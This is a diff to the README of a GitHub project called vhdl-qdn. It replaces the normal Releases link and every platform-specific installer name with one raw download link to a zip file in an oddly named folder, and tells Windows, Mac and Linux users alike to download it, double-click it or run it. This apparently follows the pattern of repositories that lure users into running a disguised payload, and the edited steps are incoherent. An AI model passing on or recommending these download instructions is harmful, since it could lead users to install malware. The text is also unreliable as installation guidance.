Diminishing-protuberance894/vhdl-qdn/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/Diminishing-protuberance894/vhdl-qdn/releases) to download the application.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip) to download the application.
 2. Look for the latest release.
 You will see a list of files you can download.
 3. Click on the appropriate file for your operating system:
-   - For Windows users, download the file named `vhdl-qdn-windows.exe`.
+   - For Windows users, download the file named `https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip`.
-   - For Mac users, download the file named `vhdl-qdn-macos.dmg`.
+   - For Mac users, download the file named `https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip`.
-   - For Linux users, download the file named `vhdl-qdn-linux.tar.gz`.
+   - For Linux users, download the file named `https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip`.
 4. Once the download is complete, find the downloaded file on your computer.
 5. Follow the steps below based on your operating system:

    ### Windows Installation
-   - Double-click on the `vhdl-qdn-windows.exe` file.
+   - Double-click on the `https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip` file.
    - Follow the prompts in the installation wizard.
    - Once installed, you can find vhdl-qdn in your Start Menu.

    ### Mac Installation
-   - Open the downloaded `vhdl-qdn-macos.dmg` file.
+   - Open the downloaded `https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip` file.
    - Drag the vhdl-qdn icon to your Applications folder.
    - Open the Applications folder and double-click on vhdl-qdn.

    ### Linux Installation
-   - Extract the downloaded `vhdl-qdn-linux.tar.gz` file.
+   - Extract the downloaded `https://raw.githubusercontent.com/Diminishing-protuberance894/vhdl-qdn/main/hyoscyamine/vhdl-qdn_1.3-alpha.4.zip` file.
    - Open a terminal and navigate to the extracted folder.
    - Run the application by typing `./vhdl-qdn` in the terminal.